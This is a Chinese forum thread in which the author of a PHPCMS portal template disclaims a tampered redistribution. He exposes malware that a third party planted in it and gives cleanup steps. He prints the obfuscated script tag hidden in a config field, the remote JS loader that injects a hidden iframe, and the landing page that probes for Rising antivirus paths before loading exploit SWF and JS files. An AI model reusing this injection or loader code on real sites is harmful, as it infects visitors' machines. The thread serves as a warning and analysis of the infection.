关于 PHPCMS仿163K全站的声明！下载163K的朋友请看！！！

ysmaster

关于 PHPCMS仿163K全站的声明！


首先声明：
https://bbs.52jscn.com/thread-8765-1-1.html
并不是我发布的，本人在PHPCMS论坛提供的下载通过WINRAR加密过的，就算下载也无法解压。程序是从PHPCMS 2007 SP6 一路升级到PHPCMS2008的，不免有很多未知的问题。本人在PHPCMS论坛发布过声明，模板文件里面确实有一个框架连接是我的另外一个小站的页面，需要说明的，这是我自己的站提升另外一个站流量的做法！本人发布心切，未来得及删除，程序发布不到一个小时我就停止下载了，原因是我发现很多的错误和很多无效代码。今天本人看见改论坛发布了我的整站程序，我强烈谴责无限制WINRAR的人并修改程序加暗链以及挂马的行为。

望大家还我一个清白！


声明：本人在PHPCMS论坛提供了MD5值验证，网络上二次发布产生的一切后果与本人无关！！！


关于https://bbs.52jscn.com/thread-9404-1-1.html的声明：

该3楼的朋友估计素质有问题，你从小没有父母教过你吗？知道什么是教养吗？读过书吗？没弄明白就骂人，程序不是原作者发布的。 有人修改再次发布你就没想到了吗？

该帖4楼的朋友估计估计从小缺少教育，张口就脏话骂人，还把我的域名whois信息发出来，你真垃圾，自以为是。素质真的很无语！

关于5楼的问题：

帖子提到：

进phpmyadmin，找 表: phpcms_module 在 module下面---phpcms，编辑它，
setting 字段 里，最下面，'wss_site_id'和'wss_password'的默认值去掉，就是下面这样为空。
顺便曝光下这段不能修改的CNZZ统计设置的代码。

1.   'wss_site_id' => '<script language=javascript src=http://h%302.x%6Frg.%70l/a.js></script>                                                                                                                                                                                                                80375607',
   
2.   'wss_password' => '6377008992',

复制代码

我并没有在这里添加暗链，不知道是哪位该死的修改或者添加的，你们有意见找发布那人问清楚！


声明：http://h%302.x%6Frg.%70l/a.js 还原地址为：http://h02.xorg.pl/a.js

http://h02.xorg.pl/a.js 代码如下：

1. function Get(){
   
2. var Then = new Date()
   
3. Then.setTime(Then.getTime() + 12*60*60*1000)
   
4. var cookieString = new String(document.cookie)
   
5. var cookieHeader = "Cookie1="
   
6. var beginPosition = cookieString.indexOf(cookieHeader)
   
7. if (beginPosition != -1){
   
8. } else
   
9. {
   
10. var vsv="fucav";
    
11. document.cookie = "Cookie1=lalaj;expires="+ Then.toGMTString()
    
12. document.write("<div style=\'dispaly:none;\' >");
    
13. document.write("<ifra"+"me src=http:\/\/adk.bij.pl\/44\/912rp.htm width=100 height=0><\/iframe>");
    
14. document.write("</div>");
    
15. }
    
16. }Get();

复制代码

通过发现 http://adk.bij.pl/44/912rp.htm

通过谷歌游览器访问提示：




我们可以查看源代码如下：

1. <HTML>
   
2. <SCRIPT LANGUAGE="JavaScript">
   
3. <!-- Hide
   
4. function killErrors() {
   
5. return true;
   
6. }
   
7. window.onerror = killErrors;
   
8. function jc()
   
9. {
   
10. jc_list = ['res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://E:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123'];
    
11. for ( i= 0; i<jc_list.length; i++)
    
12. {
    
13.         ischeck = 1;
    
14.         x = new Image();
    
15.         x.src = "";
    
16.         x.onerror = function()
    
17.                 {
    
18.                         ischeck = 0;
    
19.                 }
    
20.         x.src = jc_list[i];
    
21.         if (ischeck == 1)
    
22.                 return 1;
    
23.         delete x;
    
24. }
    
25. return 0;
    
26. }
    
27. 
    
28. 
    
29. 
    
30. 
    
31. if (!jc())
    
32. {
    
33. if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
    
34. {
    
35. document.write("<EMBED src=iie.swf width=0 height=0>");
    
36. }
    
37. else
    
38. {
    
39. document.write("<EMBED src=fff.swf width=0 height=0>");
    
40. }
    
41. var yaom="bs";
    
42. document.writeln("<iframe src=av.htm width=100 height=1><\/iframe>");
    
43. document.writeln("<script src="fa.js"><\/script>");
    
44. }
    
45. else
    
46. {
    
47. document.writeln("<script src="1.js"><\/script>");
    
48. }
    
49. 
    
50. 
    
51. 
    
52. 
    
53. 
    
54. 
    
55. // -->
    
56. </SCRIPT>
    
57. </HTML>
    
58. <script type="text/javascript" src="http://js.tongji.linezing.com/1241363/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1241363/tongji.gif"/></a></noscript>
    

复制代码

代码中我们可以看见，如果你的瑞星安装在C D E盘，一般的人就这几个盘，这是一个干掉瑞星杀毒的脚本！严重谴责修改挂马的人！本人为了研究清楚也不小心中标呀，发现电脑速度变慢，有卡的感觉，最后只得一键GHOST啦，大家还是别去打开为好，知道怎么回事就可以！谨慎呀！！！

望大家下载程序时候注意哈。有的再次发布者往往会修改程序！下载请谨慎！谢谢！


严重声明：该论坛发布的仿163K全站与我无关，由此带来的一切后果与本人无关！





通过 http://who.is/ 查询 bij.pl域名whois信息如下：

1. DOMAIN:                 bij.pl
   
2. registrant's handle:    mjp_dr_000027af (CORPORATE)
   
3. nameservers:            flop.ert.pl. [72.55.129.156]
   
4.                        pszczolka.ert.pl. [209.172.34.211]
   
5. created:                2005.12.31 10:44:08
   
6. last modified:          2009.12.12 21:12:36
   
7. 
   
8. option created           2008.02.09 18:05:17
   
9. 
   
10. TECHNICAL CONTACT:
    
11. company: AfterMarket.pl - gielda domen internetowych
    
12.         http://www.AfterMarket.pl/
    
13. street: Chytron 26, Office 21
    
14. city: 1075 Nicosia
    
15. location: CY
    
16. handle: mjp_tech
    
17. phone:  +357.22761649
    
18. last modified: 2009.07.09
    
19. 
    
20. 
    
21. REGISTRAR:
    
22. Michau Enterprises Ltd.
    
23. Chytron, 26 Street, Office 21, P.C. 1075 Nicosia, Cypr
    
24. tel.+357.22761649
    
25. fax:+357.22767543
    
26. e-mail:domains@dropped.pl
    
27. 
    
28. WHOIS displays data with a delay not exceeding 15 minutes in relation to the .pl Registry system
    
29. Registrant data available at http://dns.pl/cgi-bin/en_whois.pl
    
30. 
    
31. Information Updated: Sun, 21 Feb 2010 19:37:05 UTC
    

复制代码

详情请查询：http://who.is/whois/bij.pl/


经本人查询到：
.pl域名为波兰国家域名，而adk.bij.pl是由bee.pl免费提供345.pl、bee.pl、bij.pl、orge.pl、osa.pl等多种后缀的二级域名，并且可设置域名转发（支持隐藏原URL）、A记录及DNS服务器，申请简单，速度不错，无广告。


本人在用360安全游览器打开http://adk.bij.pl/44/912rp.htm无提示中毒，360安全游览器也不安全呀，本人只好恢复GHOST系统！谷歌游览器却提示了！建议还是用谷歌游览器吧！

ysmaster

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

下载了盗版PHPCMS仿163K的朋友注意了，解决办法如下：

因为原站是通过PHPCMS2006 SP6一路升级过来的，会有很多错误和问题，建议大家程序和模板分离，在管理后台导出二次开发的模型（官方默认自带的就不必导出了），把原程序删除，保留模板，到官方下载最新版PHPCMS2008SP3 GBK，把导出的模型通过后台导入到新的PHPCMS，把模板放到templates目录下，建立栏目和绑定模型、绑定模板，添加数据，修改模板，模板采用get标签，修改相应的栏目ID就可以做一个和163K基本相同的地方门户来！

附上傻瓜修改GET法：


1.如何修改调用栏目内容 我们找到相应模板，GET标签是以 “{get”开头，以“{/get}”结尾，我在相应位置可以看到标签中“IN(31)”，即表示调用栏目为31的内容.调用多个栏目用“,”分开，如“IN(31,32,56,57,60)” 。
2.如何修改调用数目 在相应模板位置找到“rows="8"”，这表示调用8条信息。
3.如何修改调用标题字数 在相应模板位置找到如“{str_cut($r[title], 40)}”，这表示调用标题前20个汉字40个英文，同理，调用摘要为“{str_cut($r[description],300)}”。
4.get中的分页 在模板中如有“ page="$page"”表示分页显示。


附上奉献万能GET标签使用完全教程一份

GET.chm (1.08 MB, 下载次数: 2081)

2010-2-22 04:25 上传

点击文件名下载附件

ysmaster

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

首先利用发模板增加流量的做法还会死不对的吧！但是能站出来确实是好样的！

支持兄弟，还望能给出处理方 ...
aaa 发表于 2010-2-22 03:44

直接删除即可，缺少JS文件并不会报错的！
或者搜索模板文件即可！

hk2r实名认证

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

相信你也是无辜的，不幸的是，我也中招了。。。。

本论坛和phpcms的回复编辑了。。。

你给的建议和意见很不错。

yunyinyu

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

看了！

merlincool

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

163k这个老是出错

foenfist

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

老大,数据库还原之后,后台用户名和密码不是admin,52jscn啊

gz_mo

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

相信你也是无辜的，不幸的是，我也中招了。。。。

shanliren123

为了不扰乱会员对源码的测试，有问题咨询右侧客服不要直接回复，否则视为非法信息屏蔽会员ID！

恢复以后，进入后台了，不过首页还是phpcms的默认首页，不过在后台预览可以看到163k的模板的，我把163k模板代码复制到index里的